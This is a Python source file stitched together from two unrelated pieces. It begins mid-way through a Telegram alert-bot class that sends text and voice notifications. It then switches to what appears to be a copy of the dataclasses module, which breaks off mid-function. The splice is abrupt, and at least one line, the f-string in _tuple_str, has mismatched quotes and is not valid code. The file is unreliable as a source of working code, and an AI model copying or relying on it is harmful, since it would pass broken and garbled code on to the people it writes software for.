f"/sendMessage?chat_id={os.environ[TELEGRAM_ID]}" \ f"&parse_mode=Markdown&text={message}" response = requests.get(text_url) result = response.json() logger.info(f"🤖 Bot message sent: {bool(result['ok'])}") if response.status_code != 200: logger.info(f"❌ send_text_message() failed with status={response.status_code}") if bool(result["ok"]): self.set_message_sent(force_send) return True logger.exception(f"❌ Failed to send text message: {response}") raise Exception(f"❌ Failed to send text message: {response}") @tenacity.retry(stop=stop_after_attempt(5), wait=wait_exponential(multiplier=1, min=4, max=10)) def send_audio_message(self, mp3_file_path): logger.info(f"🤖 Trying to upload audio in {mp3_file_path}...") self.bot.send_voice( chat_id=os.environ[TELEGRAM_ID], voice=open(mp3_file_path, "rb") ) def send_alert(self, message, wav_file_path=None, force_send=False): can_send = self.can_send_message(force_send) if not can_send: logger.info(f"❌ Not sending message: can_send={can_send}; force_send={force_send}.") return try: self.send_text_message(message, force_send) if wav_file_path is not None: mp3_file_path = convert_to_mp3(wav_file_path) if os.path.exists(mp3_file_path): self.send_audio_message(mp3_file_path) logger.info(f"🗑 Removing: {mp3_file_path}") os.remove(mp3_file_path) except Exception as e: logger.info(f"❌ Failed to send alert: {str(e)}") logger.exception(e)
import re import sys import copy import types import inspect import keyword import builtins import functools import abc import _thread from types import FunctionType, GenericAlias __all__ = ['dataclass', 'field', 'Field', 'FrozenInstanceError', 'InitVar', 'KW_ONLY', 'MISSING', # Helper functions. 'fields', 'asdict', 'astuple', 'make_dataclass', 'replace', 'is_dataclass', ] # Conditions for adding methods. The boxes indicate what action the # dataclass decorator takes. For all of these tables, when I talk # about init=, repr=, eq=, order=, unsafe_hash=, or frozen=, I'm # referring to the arguments to the @dataclass decorator. When # checking if a dunder method already exists, I mean check for an # entry in the class's __dict__. I never check to see if an attribute # is defined in a base class. # Key: # +=========+=========================================+ # + Value | Meaning | # +=========+=========================================+ # | <blank> | No action: no method is added. | # +---------+-----------------------------------------+ # | add | Generated method is added. | # +---------+-----------------------------------------+ # | raise | TypeError is raised. | # +---------+-----------------------------------------+ # | None | Attribute is set to None. | # +=========+=========================================+ # __init__ # # +--- init= parameter # | # v | | | # | no | yes | <--- class has __init__ in __dict__? # +=======+=======+=======+ # | False | | | # +-------+-------+-------+ # | True | add | | <- the default # +=======+=======+=======+ # __repr__ # # +--- repr= parameter # | # v | | | # | no | yes | <--- class has __repr__ in __dict__? # +=======+=======+=======+ # | False | | | # +-------+-------+-------+ # | True | add | | <- the default # +=======+=======+=======+ # __setattr__ # __delattr__ # # +--- frozen= parameter # | # v | | | # | no | yes | <--- class has __setattr__ or __delattr__ in __dict__? # +=======+=======+=======+ # | False | | | <- the default # +-------+-------+-------+ # | True | add | raise | # +=======+=======+=======+ # Raise because not adding these methods would break the "frozen-ness" # of the class. # __eq__ # # +--- eq= parameter # | # v | | | # | no | yes | <--- class has __eq__ in __dict__? # +=======+=======+=======+ # | False | | | # +-------+-------+-------+ # | True | add | | <- the default # +=======+=======+=======+ # __lt__ # __le__ # __gt__ # __ge__ # # +--- order= parameter # | # v | | | # | no | yes | <--- class has any comparison method in __dict__? # +=======+=======+=======+ # | False | | | <- the default # +-------+-------+-------+ # | True | add | raise | # +=======+=======+=======+ # Raise because to allow this case would interfere with using # functools.total_ordering. # __hash__ # +------------------- unsafe_hash= parameter # | +----------- eq= parameter # | | +--- frozen= parameter # | | | # v v v | | | # | no | yes | <--- class has explicitly defined __hash__ # +=======+=======+=======+========+========+ # | False | False | False | | | No __eq__, use the base class __hash__ # +-------+-------+-------+--------+--------+ # | False | False | True | | | No __eq__, use the base class __hash__ # +-------+-------+-------+--------+--------+ # | False | True | False | None | | <-- the default, not hashable # +-------+-------+-------+--------+--------+ # | False | True | True | add | | Frozen, so hashable, allows override # +-------+-------+-------+--------+--------+ # | True | False | False | add | raise | Has no __eq__, but hashable # +-------+-------+-------+--------+--------+ # | True | False | True | add | raise | Has no __eq__, but hashable # +-------+-------+-------+--------+--------+ # | True | True | False | add | raise | Not frozen, but hashable # +-------+-------+-------+--------+--------+ # | True | True | True | add | raise | Frozen, so hashable # +=======+=======+=======+========+========+ # For boxes that are blank, __hash__ is untouched and therefore # inherited from the base class. If the base is object, then # id-based hashing is used. # # Note that a class may already have __hash__=None if it specified an # __eq__ method in the class body (not one that was created by # @dataclass). # # See _hash_action (below) for a coded version of this table. # __match_args__ # # +--- match_args= parameter # | # v | | | # | no | yes | <--- class has __match_args__ in __dict__? # +=======+=======+=======+ # | False | | | # +-------+-------+-------+ # | True | add | | <- the default # +=======+=======+=======+ # __match_args__ is always added unless the class already defines it. It is a # tuple of __init__ parameter names; non-init fields must be matched by keyword. # Raised when an attempt is made to modify a frozen class. class FrozenInstanceError(AttributeError): pass # A sentinel object for default values to signal that a default # factory will be used. This is given a nice repr() which will appear # in the function signature of dataclasses' constructors. class _HAS_DEFAULT_FACTORY_CLASS: def __repr__(self): return '<factory>' _HAS_DEFAULT_FACTORY = _HAS_DEFAULT_FACTORY_CLASS() # A sentinel object to detect if a parameter is supplied or not. Use # a class to give it a better repr. class _MISSING_TYPE: pass MISSING = _MISSING_TYPE() # A sentinel object to indicate that following fields are keyword-only by # default. Use a class to give it a better repr. class _KW_ONLY_TYPE: pass KW_ONLY = _KW_ONLY_TYPE() # Since most per-field metadata will be unused, create an empty # read-only proxy that can be shared among all fields. _EMPTY_METADATA = types.MappingProxyType({}) # Markers for the various kinds of fields and pseudo-fields. class _FIELD_BASE: def __init__(self, name): self.name = name def __repr__(self): return self.name _FIELD = _FIELD_BASE('_FIELD') _FIELD_CLASSVAR = _FIELD_BASE('_FIELD_CLASSVAR') _FIELD_INITVAR = _FIELD_BASE('_FIELD_INITVAR') # The name of an attribute on the class where we store the Field # objects. Also used to check if a class is a Data Class. _FIELDS = '__dataclass_fields__' # The name of an attribute on the class that stores the parameters to # @dataclass. _PARAMS = '__dataclass_params__' # The name of the function, that if it exists, is called at the end of # __init__. _POST_INIT_NAME = '__post_init__' # String regex that string annotations for ClassVar or InitVar must match. # Allows "identifier.identifier[" or "identifier[". # https://bugs.python.org/issue33453 for details. _MODULE_IDENTIFIER_RE = re.compile(r'^(?:\s*(\w+)\s*\.)?\s*(\w+)') class InitVar: __slots__ = ('type', ) def __init__(self, type): self.type = type def __repr__(self): if isinstance(self.type, type): type_name = self.type.__name__ else: # typing objects, e.g. List[int] type_name = repr(self.type) return f'dataclasses.InitVar[{type_name}]' def __class_getitem__(cls, type): return InitVar(type) # Instances of Field are only ever created from within this module, # and only from the field() function, although Field instances are # exposed externally as (conceptually) read-only objects. # # name and type are filled in after the fact, not in __init__. # They're not known at the time this class is instantiated, but it's # convenient if they're available later. # # When cls._FIELDS is filled in with a list of Field objects, the name # and type fields will have been populated. class Field: __slots__ = ('name', 'type', 'default', 'default_factory', 'repr', 'hash', 'init', 'compare', 'metadata', 'kw_only', '_field_type', # Private: not to be used by user code. ) def __init__(self, default, default_factory, init, repr, hash, compare, metadata, kw_only): self.name = None self.type = None self.default = default self.default_factory = default_factory self.init = init self.repr = repr self.hash = hash self.compare = compare self.metadata = (_EMPTY_METADATA if metadata is None else types.MappingProxyType(metadata)) self.kw_only = kw_only self._field_type = None def __repr__(self): return ('Field(' f'name={self.name!r},' f'type={self.type!r},' f'default={self.default!r},' f'default_factory={self.default_factory!r},' f'init={self.init!r},' f'repr={self.repr!r},' f'hash={self.hash!r},' f'compare={self.compare!r},' f'metadata={self.metadata!r},' f'kw_only={self.kw_only!r},' f'_field_type={self._field_type}' ')') # This is used to support the PEP 487 __set_name__ protocol in the # case where we're using a field that contains a descriptor as a # default value. For details on __set_name__, see # https://www.python.org/dev/peps/pep-0487/#implementation-details. # # Note that in _process_class, this Field object is overwritten # with the default value, so the end result is a descriptor that # had __set_name__ called on it at the right time. def __set_name__(self, owner, name): func = getattr(type(self.default), '__set_name__', None) if func: # There is a __set_name__ method on the descriptor, call # it. func(self.default, owner, name) __class_getitem__ = classmethod(GenericAlias) class _DataclassParams: __slots__ = ('init', 'repr', 'eq', 'order', 'unsafe_hash', 'frozen', ) def __init__(self, init, repr, eq, order, unsafe_hash, frozen): self.init = init self.repr = repr self.eq = eq self.order = order self.unsafe_hash = unsafe_hash self.frozen = frozen def __repr__(self): return ('_DataclassParams(' f'init={self.init!r},' f'repr={self.repr!r},' f'eq={self.eq!r},' f'order={self.order!r},' f'unsafe_hash={self.unsafe_hash!r},' f'frozen={self.frozen!r}' ')') # This function is used instead of exposing Field creation directly, # so that a type checker can be told (via overloads) that this is a # function whose type depends on its parameters. def field(*, default=MISSING, default_factory=MISSING, init=True, repr=True, hash=None, compare=True, metadata=None, kw_only=MISSING): """Return an object to identify dataclass fields. default is the default value of the field. default_factory is a 0-argument function called to initialize a field's value. If init is true, the field will be a parameter to the class's __init__() function. If repr is true, the field will be included in the object's repr(). If hash is true, the field will be included in the object's hash(). If compare is true, the field will be used in comparison functions. metadata, if specified, must be a mapping which is stored but not otherwise examined by dataclass. If kw_only is true, the field will become a keyword-only parameter to __init__(). It is an error to specify both default and default_factory. """ if default is not MISSING and default_factory is not MISSING: raise ValueError('cannot specify both default and default_factory') return Field(default, default_factory, init, repr, hash, compare, metadata, kw_only) def _fields_in_init_order(fields): # Returns the fields as __init__ will output them. It returns 2 tuples: # the first for normal args, and the second for keyword args. return (tuple(f for f in fields if f.init and not f.kw_only), tuple(f for f in fields if f.init and f.kw_only) ) def _tuple_str(obj_name, fields): # Return a string representing each field of obj_name as a tuple # member. So, if fields is ['x', 'y'] and obj_name is "self", # return "(self.x,self.y)". # Special case for the 0-tuple. if not fields: return '()' # Note the trailing comma, needed if this turns out to be a 1-tuple. return f'({','.join([f'{obj_name}.{f.name}" for f in fields])},)' # This function's logic is copied from "recursive_repr" function in # reprlib module to avoid dependency. def _recursive_repr(user_function): # Decorator to make a repr function return "..." for a recursive # call. repr_running = set() @functools.wraps(user_function) def wrapper(self): key = id(self), _thread.get_ident() if key in repr_running: return '...' repr_running.add(key) try: result = user_function(self) finally: repr_running.discard(key) return result return wrapper def _create_fn(name, args, body, *, globals=None, locals=None, return_type=MISSING): # Note that we mutate locals when exec() is called. Caller # beware! The only callers are internal to this module, so no # worries about external callers. if locals is None: locals = {} if 'BUILTINS' not in locals: locals['BUILTINS'] = builtins return_annotation = '' if return_type is not MISSING: locals['_return_type'] = return_type return_annotation = '->_return_type' args = ','.join(args) body = '\n'.join(f' {b}' for b in body) # Compute the text of the entire function. txt = f' def {name}({args}){return_annotation}:\n{body}' local_vars = ', '.join(locals.keys()) txt = f"def __create_fn__({local_vars}):\n{txt}\n return {name}" ns = {} exec(txt, globals, ns) return ns['__create_fn__'](**locals) def _field_assign(frozen, name, value, self_name): # If we're a frozen class, then assign to our fields in __init__ # via object.__setattr__. Otherwise, just use a simple # assignment. # # self_name is what "self" is called in this function: don't # hard-code "self", since that might be a field name. if frozen: return f'BUILTINS.object.__setattr__({self_name},{name!r},{value})' return f'{self_name}.{name}={value}' def _field_init(f, frozen, globals, self_name): # Return the text of the line in the body of __init__ that will # initialize this field. default_name = f'_dflt_{f.name}' if f.default_factory is not MISSING: if f.init: # This field has a default factory. If a parameter is # given, use it. If not, call the factory. globals[default_name] = f.default_factory value = (f'{default_name}() ' f'if {f.name} is _HAS_DEFAULT_FACTORY ' f'else {f.name}') else: # This is a field that's not in the __init__ params, but # has a default factory function. It needs to be # initialized here by calling the factory function, # because there's no other way to initialize it. # For a field initialized with a default=defaultvalue, the # class dict just has the default value # (cls.fieldname=defaultvalue). But that won't work for a # default factory, the factory must be called in __init__ # and we must assign that to self.fieldname. We can't # fall back to the class dict's value, both because it's # not set, and because it might be different per-class # (which, after all, is why we have a factory function!). globals[default_name] = f.default_factory value = f'{default_name}()' else: # No default factory. if f.init: if f.default is MISSING: # There's no default, just do an assignment. value = f.name elif f.default is not MISSING: globals[default_name] = f.default value = f.name else: # This field does not need initialization. Signify that # to the caller by returning None. return None # Only test this now, so that we can create variables for the # default. However, return None to signify that we're not going # to actually do the assignment statement for InitVars. if f._field_type is _FIELD_INITVAR: return None # Now, actually generate the field assignment. return _field_assign(frozen, f.name, value, self_name) def _init_param(f): # Return the __init__ parameter string for this field. For # example, the equivalent of 'x:int=3' (except instead of 'int', # reference a variable set to int, and instead of '3', reference a # variable set to 3). if f.default is MISSING and f.default_factory is MISSING: # There's no default, and no default_factory, just output the # variable name and type. default = '' elif f.default is not MISSING: # There's a default, this will be the name that's used to look # it up. default = f'=_dflt_{f.name}' elif f.default_factory is not MISSING: # There's a factory function. Set a marker. default = '=_HAS_DEFAULT_FACTORY' return f'{f.name}:_type_{f.name}{default}' def _init_fn(fields, std_fields, kw_only_fields, frozen, has_post_init, self_name, globals): # fields contains both real fields and InitVar pseudo-fields. # Make sure we don't have fields without defaults following fields # with defaults. This actually would be caught when exec-ing the # function source code, but catching it here gives a better error # message, and future-proofs us in case we build up the function # using ast. seen_default = False for f in std_fields: # Only consider the non-kw-only fields in the __init__ call. if f.init: if not (f.default is MISSING and f.default_factory is MISSING): seen_default = True elif seen_default: raise TypeError(f'non-default argument {f.name!r} ' 'follows default argument') locals = {f'_type_{f.name}': f.type for f in fields} locals.update({ 'MISSING': MISSING, '_HAS_DEFAULT_FACTORY': _HAS_DEFAULT_FACTORY, }) body_lines = [] for f in fields: line = _field_init(f, frozen, locals, self_name) # line is None means that this field doesn't require # initialization (it's a pseudo-field). Just skip it. if line: body_lines.append(line) # Does this class have a post-init function? if has_post_init: params_str = ','.join(f.name for f in fields if f._field_type is _FIELD_INITVAR) body_lines.append(f'{self_name}.{_POST_INIT_NAME}({params_str})') # If no body lines, use 'pass'. if not body_lines: body_lines = ['pass'] _init_params = [_init_param(f) for f in std_fields] if kw_only_fields: # Add the keyword-only args. Because the * can only be added if # there's at least one keyword-only arg, there needs to be a test here # (instead of just concatenting the lists together). _init_params += ['*'] _init_params += [_init_param(f) for f in kw_only_fields] return _create_fn('__init__', [self_name] + _init_params, body_lines, locals=locals, globals=globals, return_type=None) def _repr_fn(fields, globals): fn = _create_fn('__repr__', ('self',), ['return self.__class__.__qualname__ + f"(' + ', '.join([f"{f.name}={{self.{f.name}!r}}" for f in fields]) + ')"'], globals=globals) return _recursive_repr(fn) def _frozen_get_del_attr(cls, fields, globals): locals = {'cls': cls, 'FrozenInstanceError': FrozenInstanceError} if fields: fields_str = '(' + ','.join(repr(f.name) for f in fields) + ',)' else: # Special case for the zero-length tuple. fields_str = '()' return (_create_fn('__setattr__', ('self', 'name', 'value'), (f'if type(self) is cls or name in {fields_str}:', ' raise FrozenInstanceError(f"cannot assign to field {name!r}")', f'super(cls, self).__setattr__(name, value)'), locals=locals, globals=globals), _create_fn('__delattr__', ('self', 'name'), (f'if type(self) is cls or name in {fields_str}:', ' raise FrozenInstanceError(f"cannot delete field {name!r}")', f'super(cls, self).__delattr__(name)'), locals=locals, globals=globals), ) def _cmp_fn(name, op, self_tuple, other_tuple, globals): # Create a comparison function. If the fields in the object are # named 'x' and 'y', then self_tuple is the string # '(self.x,self.y)' and other_tuple is the string # '(other.x,other.y)'. return _create_fn(name, ('self', 'other'), [ 'if other.__class__ is self.__class__:', f' return {self_tuple}{op}{other_tuple}', 'return NotImplemented'], globals=globals) def _hash_fn(fields, globals): self_tuple = _tuple_str('self', fields) return _create_fn('__hash__', ('self',), [f'return hash({self_tuple})'], globals=globals) def _is_classvar(a_type, typing): # This test uses a typing internal class, but it's the best way to # test if this is a ClassVar. return (a_type is typing.ClassVar or (type(a_type) is typing._GenericAlias and a_type.__origin__ is typing.ClassVar)) def _is_initvar(a_type, dataclasses): # The module we're checking against is the module we're # currently in (dataclasses.py). return (a_type is dataclasses.InitVar or type(a_type) is dataclasses.InitVar) def _is_kw_only(a_type, dataclasses): return a_type is dataclasses.KW_ONLY def _is_type(annotation, cls, a_module, a_type, is_type_predicate): # Given a type annotation string, does it refer to a_type in # a_module? For example, when checking that annotation denotes a # ClassVar, then a_module is typing, and a_type is # typing.ClassVar. # It's possible to look up a_module given a_type, but it involves # looking in sys.modules (again!), and seems like a waste since # the caller already knows a_module. # - annotation is a string type annotation # - cls is the class that this annotation was found in # - a_module is the module we want to match # - a_type is the type in that module we want to match # - is_type_predicate is a function called with (obj, a_module) # that determines if obj is of the desired type. # Since this test does not do a local namespace lookup (and # instead only a module (global) lookup), there are some things it # gets wrong. # With string annotations, cv0 will be detected as a ClassVar: # CV = ClassVar # @dataclass # class C0: # cv0: CV # But in this example cv1 will not be detected as a ClassVar: # @dataclass # class C1: # CV = ClassVar # cv1: CV # In C1, the code in this function (_is_type) will look up "CV" in # the module and not find it, so it will not consider cv1 as a # ClassVar. This is a fairly obscure corner case, and the best # way to fix it would be to eval() the string "CV" with the # correct global and local namespaces. However that would involve # a eval() penalty for every single field of every dataclass # that's defined. It was judged not worth it. match = _MODULE_IDENTIFIER_RE.match(annotation) if match: ns = None module_name = match.group(1) if not module_name: # No module name, assume the class's module did # "from dataclasses import InitVar". ns = sys.modules.get(cls.__module__).__dict__ else: # Look up module_name in the class's module. module = sys.modules.get(cls.__module__) if module and module.__dict__.get(module_name) is a_module: ns = sys.modules.get(a_type.__module__).__dict__ if ns and is_type_predicate(ns.get(match.group(2)), a_module): return True return False def _get_field(cls, a_name, a_type, default_kw_only): # Return a Field object for this field name and type. ClassVars and # InitVars are also returned, but marked as such (see f._field_type). # default_kw_only is the value of kw_only to use if there isn't a field() # that defines it. # If the default value isn't derived from Field, then it's only a # normal default value. Convert it to a Field(). default = getattr(cls, a_name, MISSING) if isinstance(default, Field): f = default else: if isinstance(default, types.MemberDescriptorType): # This is a field in __slots__, so it has no default value. default = MISSING f = field(default=default) # Only at this point do we know the name and the type. Set them. f.name = a_name f.type = a_type # Assume it's a normal field until proven otherwise. We're next # going to decide if it's a ClassVar or InitVar, everything else # is just a normal field. f._field_type = _FIELD # In addition to checking for actual types here, also check for # string annotations. get_type_hints() won't always work for us # (see https://github.com/python/typing/issues/508 for example), # plus it's expensive and would require an eval for every string # annotation. So, make a best effort to see if this is a ClassVar # or InitVar using regex's and checking that the thing referenced # is actually of the correct type. # For the complete discussion, see https://bugs.python.org/issue33453 # If typing has not been imported, then it's impossible for any # annotation to be a ClassVar. So, only look for ClassVar if # typing has been imported by any module (not necessarily cls's # module). typing = sys.modules.get('typing') if typing: if (_is_classvar(a_type, typing) or (isinstance(f.type, str) and _is_type(f.type, cls, typing, typing.ClassVar, _is_classvar))): f._field_type = _FIELD_CLASSVAR # If the type is InitVar, or if it's a matching string annotation, # then it's an InitVar. if f._field_type is _FIELD: # The module we're checking against is the module we're # currently in (dataclasses.py). dataclasses = sys.modules[__name__] if (_is_initvar(a_type, dataclasses) or (isinstance(f.type, str) and _is_type(f.type, cls, dataclasses, dataclasses.InitVar, _is_initvar))): f._field_type = _FIELD_INITVAR # Validations for individual fields. This is delayed until now, # instead of in the Field() constructor, since only here do we # know the field name, which allows for better error reporting. # Special restrictions for ClassVar and InitVar. if f._field_type in (_FIELD_CLASSVAR, _FIELD_INITVAR): if f.default_factory is not MISSING: raise TypeError(f'field {f.name} cannot have a ' 'default factory') # Should I check for other field settings? default_factory # seems the most serious to check for. Maybe add others. For # example, how about init=False (or really, # init=<not-the-default-init-value>)? It makes no sense for # ClassVar and InitVar to specify init=<anything>. # kw_only validation and assignment. if f._field_type in (_FIELD, _FIELD_INITVAR): # For real and InitVar fields, if kw_only wasn't specified use the # default value. if f.kw_only is MISSING: f.kw_only = default_kw_only else: # Make sure kw_only isn't set for ClassVars assert f._field_type is _FIELD_CLASSVAR if f.kw_only is not MISSING: raise TypeError(f'field {f.name} is a ClassVar but specifies ' 'kw_only') # For real fields, disallow mutable defaults for known types. if f._field_type is _FIELD and isinstance(f.default, (list, dict, set)): raise ValueError(f'mutable default {type(f.default)} for field ' f'{f.name} is not allowed: use default_factory') return f def _set_qualname(cls, value): # Ensure that the functions returned from _create_fn uses the proper # __qualname__ (the class they belong to). if isinstance(value, FunctionType): value.__qualname__ = f"{cls.__qualname__}.{value.__name__}" return value def _set_new_attribute(cls, name, value): # Never overwrites an existing attribute. Returns True if the # attribute already exists. if name in cls.__dict__: return True _set_qualname(cls, value) setattr(cls, name, value) return False # Decide if/how we're going to create a hash function. Key is # (unsafe_hash, eq, frozen, does-hash-exist). Value is the action to # take. The common case is to do nothing, so instead of providing a # function that is a no-op, use None to signify that. def _hash_set_none(cls, fields, globals): return None def _hash_add(cls, fields, globals): flds = [f for f in fields if (f.compare if f.hash is None else f.hash)] return _set_qualname(cls, _hash_fn(flds, globals)) def _hash_exception(cls, fields, globals): # Raise an exception. raise TypeError(f'Cannot overwrite attribute __hash__ ' f'in class {cls.__name__}') # # +-------------------------------------- unsafe_hash? # | +------------------------------- eq? # | | +------------------------ frozen? # | | | +---------------- has-explicit-hash? # | | | | # | | | | +------- action # | | | | | # v v v v v _hash_action = {(False, False, False, False): None, (False, False, False, True ): None, (False, False, True, False): None, (False, False, True, True ): None, (False, True, False, False): _hash_set_none, (False, True, False, True ): None, (False, True, True, False): _hash_add, (False, True, True, True ): None, (True, False, False, False): _hash_add, (True, False, False, True ): _hash_exception, (True, False, True, False): _hash_add, (True, False, True, True ): _hash_exception, (True, True, False, False): _hash_add, (True, True, False, True ): _hash_exception, (True, True, True, False): _hash_add, (True, True, True, True ): _hash_exception, } # See https://bugs.python.org/issue32929#msg312829 for an if-statement # version of this table. def _process_class(cls, init, repr, eq, order, unsafe_hash, frozen, match_args, kw_only, slots): # Now that dicts retain insertion order, there's no reason to use # an ordered dict. I am leveraging that ordering here, because # derived class fields overwrite base class fields, but the order # is defined by the base class, which is found first. fields = {} if cls.__module__ in sys.modules: globals = sys.modules[cls.__module__].__dict__ else: # Theoretically this can happen if someone writes # a custom string to cls.__module__. In which case # such dataclass won't be fully introspectable # (w.r.t. typing.get_type_hints) but will still function # correctly. globals = {} setattr(cls, _PARAMS, _DataclassParams(init, repr, eq, order, unsafe_hash, frozen)) # Find our base classes in reverse MRO order, and exclude # ourselves. In reversed order so that more derived classes # override earlier field definitions in base classes. As long as # we're iterating over them, see if any are frozen. any_frozen_base = False has_dataclass_bases = False for b in cls.__mro__[-1:0:-1]: # Only process classes that have been processed by our # decorator. That is, they have a _FIELDS attribute. base_fields = getattr(b, _FIELDS, None) if base_fields is not None: has_dataclass_bases = True for f in base_fields.values(): fields[f.name] = f if getattr(b, _PARAMS).frozen: any_frozen_base = True # Annotations that are defined in this class (not in base # classes). If __annotations__ isn't present, then this class # adds no new annotations. We use this to compute fields that are # added by this class. # # Fields are found from cls_annotations, which is guaranteed to be # ordered. Default values are from class attributes, if a field # has a default. If the default value is a Field(), then it # contains additional info beyond (and possibly including) the # actual default value. Pseudo-fields ClassVars and InitVars are # included, despite the fact that they're not real fields. That's # dealt with later. cls_annotations = cls.__dict__.get('__annotations__', {}) # Now find fields in our class. While doing so, validate some # things, and set the default values (as class attributes) where # we can. cls_fields = [] # Get a reference to this module for the _is_kw_only() test. KW_ONLY_seen = False dataclasses = sys.modules[__name__] for name, type in cls_annotations.items(): # See if this is a marker to change the value of kw_only. if (_is_kw_only(type, dataclasses) or (isinstance(type, str) and _is_type(type, cls, dataclasses, dataclasses.KW_ONLY, _is_kw_only))): # Switch the default to kw_only=True, and ignore this # annotation: it's not a real field. if KW_ONLY_seen: raise TypeError(f'{name!r} is KW_ONLY, but KW_ONLY ' 'has already been specified') KW_ONLY_seen = True kw_only = True else: # Otherwise it's a field of some type. cls_fields.append(_get_field(cls, name, type, kw_only)) for f in cls_fields: fields[f.name] = f # If the class attribute (which is the default value for this # field) exists and is of type 'Field', replace it with the # real default. This is so that normal class introspection # sees a real default value, not a Field. if isinstance(getattr(cls, f.name, None), Field): if f.default is MISSING: # If there's no default, delete the class attribute. # This happens if we specify field(repr=False), for # example (that is, we specified a field object, but # no default value). Also if we're using a default # factory. The class attribute should not be set at # all in the post-processed class. delattr(cls, f.name) else: setattr(cls, f.name, f.default) # Do we have any Field members that don't also have annotations? for name, value in cls.__dict__.items(): if isinstance(value, Field) and not name in cls_annotations: raise TypeError(f'{name!r} is a field but has no type annotation') # Check rules that apply if we are derived from any dataclasses. if has_dataclass_bases: # Raise an exception if any of our bases are frozen, but we're not. if any_frozen_base and not frozen: raise TypeError('cannot inherit non-frozen dataclass from a ' 'frozen one') # Raise an exception if we're frozen, but none of our bases are. if not any_frozen_base and frozen: raise TypeError('cannot inherit frozen dataclass from a ' 'non-frozen one') # Remember all of the fields on our class (including bases). This # also marks this class as being a dataclass. setattr(cls, _FIELDS, fields) # Was this class defined with an explicit __hash__? Note that if # __eq__ is defined in this class, then python will automatically # set __hash__ to None. This is a heuristic, as it's possible # that such a __hash__ == None was not auto-generated, but it # close enough. class_hash = cls.__dict__.get('__hash__', MISSING) has_explicit_hash = not (class_hash is MISSING or (class_hash is None and '__eq__' in cls.__dict__)) # If we're generating ordering methods, we must be generating the # eq methods. if order and not eq: raise ValueError('eq must be true if order is true') # Include InitVars and regular fields (so, not ClassVars). This is # initialized here, outside of the "if init:" test, because std_init_fields # is used with match_args, below. all_init_fields = [f for f in fields.values() if f._field_type in (_FIELD, _FIELD_INITVAR)] (std_init_fields, kw_only_init_fields) = _fields_in_init_order(all_init_fields) if init: # Does this class have a post-init function? has_post_init = hasattr(cls, _POST_INIT_NAME) _set_new_attribute(cls, '__init__', _init_fn(all_init_fields, std_init_fields, kw_only_init_fields, frozen, has_post_init, # The name to use for the "self" # param in __init__. Use "self" # if possible. '__dataclass_self__' if 'self' in fields else 'self', globals, )) # Get the fields as a list, and include only real fields. This is # used in all of the following methods. field_list = [f for f in fields.values() if f._field_type is _FIELD] if repr: flds = [f for f in field_list if f.repr] _set_new_attribute(cls, '__repr__', _repr_fn(flds, globals)) if eq: # Create __eq__ method. There's no need for a __ne__ method, # since python will call __eq__ and negate it. flds = [f for f in field_list if f.compare] self_tuple = _tuple_str('self', flds) other_tuple = _tuple_str('other', flds) _set_new_attribute(cls, '__eq__', _cmp_fn('__eq__', '==', self_tuple, other_tuple, globals=globals)) if order: # Create and set the ordering methods. flds = [f for f in field_list if f.compare] self_tuple = _tuple_str('self', flds) other_tuple = _tuple_str('other', flds) for name, op in [('__lt__', '<'), ('__le__', '<='), ('__gt__', '>'), ('__ge__', '>='), ]: if _set_new_attribute(cls, name, _cmp_fn(name, op, self_tuple, other_tuple, globals=globals)): raise TypeError(f'Cannot overwrite attribute {name} ' f'in class {cls.__name__}. Consider using ' 'functools.total_ordering') if frozen: for fn in _frozen_get_del_attr(cls, field_list, globals): if _set_new_attribute(cls, fn.__name__, fn): raise TypeError(f'Cannot overwrite attribute {fn.__name__} ' f'in class {cls.__name__}') # Decide if/how we're going to create a hash function. hash_action = _hash_action[bool(unsafe_hash), bool(eq), bool(frozen), has_explicit_hash] if hash_action: # No need to call _set_new_attribute here, since by the time # we're here the overwriting is unconditional. cls.__hash__ = hash_action(cls, field_list, globals) if not getattr(cls, '__doc__'): # Create a class doc-string. cls.__doc__ = (cls.__name__ + str(inspect.signature(cls)).replace(' -> None', '')) if match_args: # I could probably compute this once _set_new_attribute(cls, '__match_args__', tuple(f.name for f in std_init_fields)) if slots: cls = _add_slots(cls, frozen) abc.update_abstractmethods(cls) return cls # _dataclass_getstate and _dataclass_setstate are needed for pickling frozen # classes with slots. These could be slighly more performant if we generated # the code instead of iterating over fields. But that can be a project for # another day, if performance becomes an issue. def _dataclass_getstate(self): return [getattr(self, f.name) for f in fields(self)] def _dataclass_setstate(self, state): for field, value in zip(fields(self), state): # use setattr because dataclass may be frozen object.__setattr__(self, field.name, value) def _add_slots(cls, is_frozen): # Need to create a new class, since we can't set __slots__ # after a class has been created. # Make sure __slots__ isn't already set. if '__slots__' in cls.__dict__: raise TypeError(f'{cls.__name__} already specifies __slots__') # Create a new dict for our new class. cls_dict = dict(cls.__dict__) field_names = tuple(f.name for f in fields(cls)) cls_dict['__slots__'] = field_names for field_name in field_names: # Remove our attributes, if present. They'll still be # available in _MARKER. cls_dict.pop(field_name, None) # Remove __dict__ itself. cls_dict.pop('__dict__', None) # And finally create the class. qualname = getattr(cls, '__qualname__', None) cls = type(cls)(cls.__name__, cls.__bases__, cls_dict) if qualname is not None: cls.__qualname__ = qualname if is_frozen: # Need this for pickling frozen classes with slots. cls.__getstate__ = _dataclass_getstate cls.__setstate__ = _dataclass_setstate return cls def dataclass(cls=None, /, *, init=True, repr=True, eq=True, order=False, unsafe_hash=False, frozen=False, match_args=True, kw_only=False, slots=False): """Returns the same class as was passed in, with dunder methods added based on the fields defined in the class. Examines PEP 526 __annotations__ to determine fields. If init is true, an __init__() method is added to the class. If repr is true, a __repr__() method is added. If order is true, rich comparison dunder methods are added. If unsafe_hash is true, a __hash__() method function is added. If frozen is true, fields may not be assigned to after instance creation. If match_args is true, the __match_args__ tuple is added. If kw_only is true, then by default all fields are keyword-only. If slots is true, an __slots__ attribute is added. """ def wrap(cls): return _process_class(cls, init, repr, eq, order, unsafe_hash, frozen, match_args, kw_only, slots) # See if we're being called as @dataclass or @dataclass(). if cls is None: # We're called with parens. return wrap # We're called as @dataclass without parens. return wrap(cls) def fields(class_or_instance): """Return a tuple describing the fields of this dataclass. Accepts a dataclass or an instance of one. Tuple elements are of type Field. """ # Might it be worth caching this, per class? try: fields = getattr(class_or_instance, _FIELDS) except AttributeError: raise TypeError('must be called with a dataclass type or instance') # Exclude pseudo-fields. Note that fields is sorted by insertion # order, so the order of the tuple is as the fields were defined. return tuple(f for f in fields.values() if f._field_type is _FIELD) def _is_dataclass_instance(obj): """Returns True if obj is an instance of a dataclass.""" return hasattr(type(obj), _FIELDS) def is_dataclass(obj): """Returns True if obj is a dataclass or an instance of a dataclass.""" cls = obj if isinstance(obj, type) else type(obj) return 